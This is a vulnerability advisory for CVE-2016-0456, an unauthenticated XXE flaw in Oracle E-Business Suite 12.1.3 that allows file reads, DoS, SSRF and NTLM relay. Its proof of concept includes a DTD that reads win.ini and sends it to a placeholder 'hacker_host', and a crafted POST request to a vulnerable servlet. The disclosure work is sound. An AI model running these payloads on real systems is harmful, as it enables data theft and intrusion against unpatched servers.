Application: Oracle E-Business Suite
Versions Affected: Oracle E-Business Suite 12.1.3, probably others
Bugs: XXE injection
Vendor response: 24.07.2015
Date of Public Advisory: 19.01.2016
Reference: Oracle CPU Jan 2016
Author: Nikita Kelesis, Ivan Chalykin, Alexey Tyurin
Class: XML External Entity [CWE-611]
Impact: information disclosure, DoS, SSRF, NTLM relay
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2016-0456
CVSS Base Score: 5 / 10
|AV: Access Vector (Related exploit range)||Network (N)|
|AC: Access Complexity (Required attack complexity)||Medium (M)|
|Au: Authentication (Level of authentication needed to exploit)||None (N)|
|C: Impact to Confidentiality||Partial (P)|
|I: Impact to Integrity||Partial (P)|
|A: Impact to Availability||Partial (P)|
An attacker can read an arbitrary file on the server by sending a correct XML request with a crafted DTD to read the reply from the service.
An attacker can perform a DoS attack (for example, an XML Entity Expansion attack).
An SMB Relay attack is a type of Man-in-the-Middle attack where an attacker asks a victim to authenticate into a machine controlled by the attacker, then relays the credentials to the target. The attacker forwards the authentication information both ways and gets access.
Oracle E-Business Suite 12.1.3 XML parser validates all incoming XML requests with a user-specified DTD.
Oracle E-Business Suite 12.1.3
Other versions are probably affected too, but they were not checked.
Servlet can be accessed remotely without authentication
Servlet can be used to send XML messages which will be processed via XML parser
XML parser validates all incoming XML requests with user-specified DTD
An attacker sends an XML request with malformed entity and can:
1) read a file in an OS (depends on process permissions)
2) perform a DoS attack
3) make an SSRF ("tunnel" to local services, internal network)
4) For Windows OS: initiate SMB/HTTP request to a hacker host and steal NTLM hash or perform an SMB relay attack.
To read a local file (universal way):
1) Run a web server with the file (evil.xml)that contains:
<!ENTITY % payload SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY external SYSTEM 'http://hacker_host:8090/%payload;'>">
2) Open any port (8090, for example) and wait for the payload from a victim here
3) Send the request to the victim:
POST /OA_HTML/copxmllcmservicecontroller.js HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://hacker_host/evil.xml">
It's possible to perform the attack without external (hacker's) server, but it is necessary to make customization of the request for every servlet's input points.
SOLUTIONS AND WORKAROUNDS
Install Oracle CPU Jan 2016